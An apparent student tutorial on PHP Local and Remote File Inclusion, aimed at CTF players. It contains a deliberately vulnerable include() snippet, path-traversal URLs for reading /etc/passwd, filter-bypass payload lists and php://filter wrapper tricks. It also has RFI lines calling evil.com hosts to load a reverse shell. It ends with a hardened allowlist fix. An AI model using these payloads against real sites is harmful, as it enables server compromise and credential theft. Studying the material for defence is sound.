Pwning PHP Websites: RFI & LFI

Mudhalai Mr
Developer Community SASTRA
3 min read, Mar 23, 2021

PHP is one of the most widely used languages for web development (more than 60%), which makes it one of the most targeted.

image credits: google

Also, PHP websites are common in CTFs because it is easy to write vulnerable code in PHP.

Local File Inclusion (LFI) exists in websites that don’t properly sanitize input; this allows an attacker to include sensitive files that are already on the server.

Remote File Inclusion (RFI) occurs in websites that dynamically reference external files without checking them.

RFI vs LFI:

Remote File Inclusion and Local File Inclusion are not the same. In LFI, the attacker includes a file that is already on the server, but in RFI, the attacker includes a file hosted on the attacker’s own server.

Why specifically PHP?

PHP is weird. It has a lot of unique features and some very dangerous functions, which leads to lots of PHP-specific vulnerabilities like type juggling.

<?php
// Vulnerable example: the "page" parameter goes straight into include().
// file_exists() only checks that something exists at that path; it does not
// stop "../" traversal or validate that the file is one the site meant to serve.
$page = $_GET['page'];
if (file_exists($page))
{
    include($page);
}
?>

Take a look at this code: we fully control the $page variable through the page URL parameter.

https://www.example.com/?page=index.php

What happens if we request a sensitive file like the passwd file or the shadow file?

As there is no input sanitization, we can walk up the directory tree and request those sensitive files without any problem, and the server will return them:

https://www.example.com/?page=/../../../etc/passwd

In the case of CTFs, we can read the flag file.

Reading files that are already on the server is “Local File Inclusion”, or LFI.

Now think about what happens if we give http://www.google.com as the value of the page parameter:

https://www.example.com/?page=http://www.google.com

The website will fetch the Google page’s source code and return it (told you PHP is weird). By pointing the parameter at a malicious file instead, an attacker can execute their own code or get a reverse shell on the server. Note that remote includes only work when the allow_url_include setting is enabled; it is Off by default.

https://www.example.com/?page=http://lol.evil.com/revershell.php

Reverse shell: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Now, let us continue with filter bypass techniques:

LFI:

http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd

RFI:

http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

Wrappers:

PHP supports wrappers; you can learn more about them here:

To bypass filters and firewalls, we can have the server return the file base64-encoded using the php://filter wrapper:

http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Also, you can get the file as a zip file (how crazy is that?):

http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
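As an added example (not code from the original post), here is a hardened replacement for the include routine shown earlier. It assumes the includable pages live in a pages/ directory beside the script and that the application only needs the three page names in the allowlist (both are assumptions for illustration). Because the raw parameter never reaches include(), every payload in the LFI, RFI and wrapper lists above is rejected before it matters.

```php
<?php
// Added example: safe page selection instead of include($_GET['page']).
// Assumption: includable files live in PAGES_DIR and are named <name>.php.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

/**
 * Map a user-supplied page name to a real file inside PAGES_DIR.
 * Returns the absolute path, or null if the request is not acceptable.
 */
function resolvePage(string $requested): ?string
{
    // 1. Allowlist: the only values the application actually supports.
    //    "../", "%00", "php://filter" and "http://" can never match.
    $allowed = ['index', 'about', 'contact'];
    if (!in_array($requested, $allowed, true)) {
        return null;
    }

    // 2. Build the path ourselves; user input never contributes a slash,
    //    a wrapper scheme or an extension.
    $candidate = PAGES_DIR . '/' . $requested . '.php';

    // 3. Defence in depth: realpath() resolves symlinks and ".." and
    //    returns false for missing files; the result must still sit
    //    inside the pages directory.
    $real = realpath($candidate);
    $base = realpath(PAGES_DIR);
    if ($real === false || $base === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

$page = resolvePage($_GET['page'] ?? 'index');
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

Independently of the application code, keeping allow_url_include=Off in php.ini (its default) removes the remote-include vector entirely.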

Resources:

It is hard to write clean code in PHP, and this leads to a lot of human errors, which makes websites vulnerable to these attacks. There are other vulnerabilities that are cooler than RFI & LFI, so go explore!!

Thanks :) Mudhalai Mr, DSC SASTRA Deemed University

AKA Gowtham, student at SASTRA Deemed University, core team member of DSC SASTRA